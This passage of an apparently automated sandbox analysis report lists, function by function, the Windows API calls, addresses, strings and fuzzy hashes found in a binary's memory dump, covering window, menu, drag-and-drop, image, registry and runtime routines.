                                                                                                                                                                                          • Instruction ID: 3777c174bd4d4e5fad4fc56bdf8f6c37b3828b22cf480f06ffe272bc71a466c1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9265c8685dcfa10b24002fdc8444d70ea0fa48396d49d46b420859095636334e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 94717BB0104245AFD729CF18CC48F6ABBE9FB89304F04446DF98597261CB79E946CF16
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
                                                                                                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 007C9BA3
                                                                                                                                                                                            • Part of subcall function 007C80AE: ClientToScreen.USER32(?,?), ref: 007C80D4
                                                                                                                                                                                            • Part of subcall function 007C80AE: GetWindowRect.USER32(?,?), ref: 007C814A
                                                                                                                                                                                            • Part of subcall function 007C80AE: PtInRect.USER32(?,?,?), ref: 007C815A
                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 007C9C0C
                                                                                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007C9C17
                                                                                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007C9C3A
                                                                                                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007C9C81
                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 007C9C9A
                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 007C9CB1
                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 007C9CD3
                                                                                                                                                                                          • DragFinish.SHELL32(?), ref: 007C9CDA
                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 007C9DCD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                          • API String ID: 221274066-3440237614
                                                                                                                                                                                          • Opcode ID: 8c7df114848d87755e91eb2344aa99e8831853dcda42a070fea09623f47a4b20
                                                                                                                                                                                          • Instruction ID: e365a570724a7ed0e07a78acd6e6a683a54101f3cd74c2935dcc78bc15927b0b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c7df114848d87755e91eb2344aa99e8831853dcda42a070fea09623f47a4b20
                                                                                                                                                                                          • Instruction Fuzzy Hash: 79616971108305AFD711EF60DC89EAFBBE8FF88750F40492DF691921A1DB789A49CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007C66D6,?,?), ref: 007C8FEE
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C8FFE
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9009
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9016
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9024
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9033
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C903C
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9043
                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007C66D6,?,?,00000000,?), ref: 007C9054
                                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,007D0C04,?), ref: 007C906D
                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007C907D
                                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 007C909D
                                                                                                                                                                                          • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 007C90CD
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 007C90F5
                                                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007C910B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3840717409-0
                                                                                                                                                                                          • Opcode ID: d5942ba8101d592d2d81de8314468548c8dd5d025b088fd08e466792678fb90e
                                                                                                                                                                                          • Instruction ID: 7013e3a4e61df5cb558c6ec91e30e782312b57bb120a044633b432740c8ef945
                                                                                                                                                                                          • Opcode Fuzzy Hash: d5942ba8101d592d2d81de8314468548c8dd5d025b088fd08e466792678fb90e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70411675600209EFDB219F65DC8CEAABBB8FB89711F10806CFA05E7260D7389D41CB24
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 007A1EC1
                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 007A1ECA
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007A1ED6
                                                                                                                                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007A1FBA
                                                                                                                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 007A2016
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 007A20C7
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 007A214B
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007A2197
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007A21A6
                                                                                                                                                                                          • VariantInit.OLEAUT32(00000000), ref: 007A21E2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                          • API String ID: 1234038744-3931177956
                                                                                                                                                                                          • Opcode ID: 3d98d67e2b3ea0e37b94e568dd00dd8adce3e934c3b329d21643417f11650d8b
                                                                                                                                                                                          • Instruction ID: 70194047cfedd8daa8b3788e2735c1e68d0ed301189f313dc00698501564bdfa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d98d67e2b3ea0e37b94e568dd00dd8adce3e934c3b329d21643417f11650d8b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13D14472A04515EFEB249F68C888B79B7B4FF46301F908259FD059B192DB3CAD01DBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BC10E,?,?), ref: 007BD415
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD451
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4C8
                                                                                                                                                                                            • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4FE
                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BC154
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007BC1D2
                                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 007BC26A
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 007BC2DE
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 007BC2FC
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 007BC352
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007BC364
                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 007BC382
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 007BC3E3
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 007BC3F4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                          • API String ID: 146587525-4033151799
                                                                                                                                                                                          • Opcode ID: e45c6d409258228cb209e18596dc29afa900a4cc1702d4da4bf44a27619ecbfb
                                                                                                                                                                                          • Instruction ID: 6d19fb2e8eed018050b67c477c6ad774cb47ed712da4ddd6e63587bb6ec5d13e
                                                                                                                                                                                          • Opcode Fuzzy Hash: e45c6d409258228cb209e18596dc29afa900a4cc1702d4da4bf44a27619ecbfb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 12C15B74204201EFD725DF18C499F6ABBE1BF84304F54C49CE4558B2A2CB79ED46CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 007B3035
                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007B3045
                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 007B3051
                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 007B305E
                                                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 007B30CA
                                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007B3109
                                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007B312D
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 007B3135
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 007B313E
                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 007B3145
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 007B3150
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                                                                                          • Opcode ID: 03b91321912ed592e547d0f442ed244b66b5f9c63355c7949af57110850a7f8a
                                                                                                                                                                                          • Instruction ID: 81716252236265a5c6b674186fc726070157a2a17bb9aa9c4f9603ffc4d12b96
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03b91321912ed592e547d0f442ed244b66b5f9c63355c7949af57110850a7f8a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7061F375D00219EFCB14CFA8D888EAEBBB6FF48310F208529E555A7210D775A941CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0076DE21
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076D9D9
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076D9EB
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076D9FD
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA0F
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA21
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA33
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA45
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA57
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA69
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA7B
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA8D
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DA9F
                                                                                                                                                                                            • Part of subcall function 0076D9BC: _free.LIBCMT ref: 0076DAB1
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DE16
                                                                                                                                                                                            • Part of subcall function 00762D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4), ref: 00762D4E
                                                                                                                                                                                            • Part of subcall function 00762D38: GetLastError.KERNEL32(00801DC4,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4,00801DC4), ref: 00762D60
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DE38
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DE4D
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DE58
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DE7A
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DE8D
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DE9B
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DEA6
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DEDE
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DEE5
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DF02
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DF1A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                          • Opcode ID: 4f6d07ade34935f51e1493905b4d9b869777fca5b415b7f5d63c43e1cb002e3d
                                                                                                                                                                                          • Instruction ID: 4527ad1af7fef14e22e95c8c944300e7e5ad375d4b6bd9a25e5c9275cb634caa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f6d07ade34935f51e1493905b4d9b869777fca5b415b7f5d63c43e1cb002e3d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B7314B31B14705DFEB71AA38D849B5A73E9AF21350F144829E85BDB152DF7AAC41CB20
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 007CA990
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 007CA9A7
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 007CA9B3
                                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 007CA9C9
                                                                                                                                                                                          • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 007CAC15
                                                                                                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007CAC33
                                                                                                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007CAC54
                                                                                                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 007CAC73
                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 007CAC95
                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000005,?), ref: 007CACBB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 3962739598-2766056989
                                                                                                                                                                                          • Opcode ID: fe40ef01881b4138003870f9b694b89620d63702a303e3e4673d0c853d215d4e
                                                                                                                                                                                          • Instruction ID: 8c9d85bae2844077842cfbd8b245e81e60c44ea5ff7a8707d965e6059565449c
                                                                                                                                                                                          • Opcode Fuzzy Hash: fe40ef01881b4138003870f9b694b89620d63702a303e3e4673d0c853d215d4e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 81B18C71500219EFDF24CF68C989BAE7BB1BF4470AF14806DED449B295D778AD80CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 007952E6
                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00795328
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00795339
                                                                                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00795345
                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0079537A
                                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 007953B2
                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 007953EB
                                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00795445
                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00795477
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 007954EF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                          • String ID: ThumbnailClass
                                                                                                                                                                                          • API String ID: 1311036022-1241985126
                                                                                                                                                                                          • Opcode ID: 968cb00fbc419e65f3a555a612d44e3579cde6bf893518de28f31ded3a30c28d
                                                                                                                                                                                          • Instruction ID: 58cb989c576f0cdcf832f9c4ec18f24593ba817d8eb7d2daf311096126b3e358
                                                                                                                                                                                          • Opcode Fuzzy Hash: 968cb00fbc419e65f3a555a612d44e3579cde6bf893518de28f31ded3a30c28d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0991F671104B16EFDF15CF24E895BAAB7AAFF00344F00452DFA8A82191EB39ED55CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
                                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007C97B6
                                                                                                                                                                                          • GetFocus.USER32 ref: 007C97C6
                                                                                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 007C97D1
                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 007C9879
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007C992B
                                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 007C9948
                                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 007C9958
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007C998A
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007C99CC
                                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007C99FD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 1026556194-4108050209
                                                                                                                                                                                          • Opcode ID: 3e23778eb017fb42219a2ccdc6ec2896904035b5db6a7e1f22d9edfc433684aa
                                                                                                                                                                                          • Instruction ID: 11d9efa460fbdcecb9d1f790528431c8d2a8ab33a9f2c14f96b6f66ec795fc1c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e23778eb017fb42219a2ccdc6ec2896904035b5db6a7e1f22d9edfc433684aa
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE81AF715043019FD760CF24D888FAB7BE8FB89754F00492DFA9597291DB78E905CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetMenuItemInfoW.USER32(008029C0,000000FF,00000000,00000030), ref: 0079C973
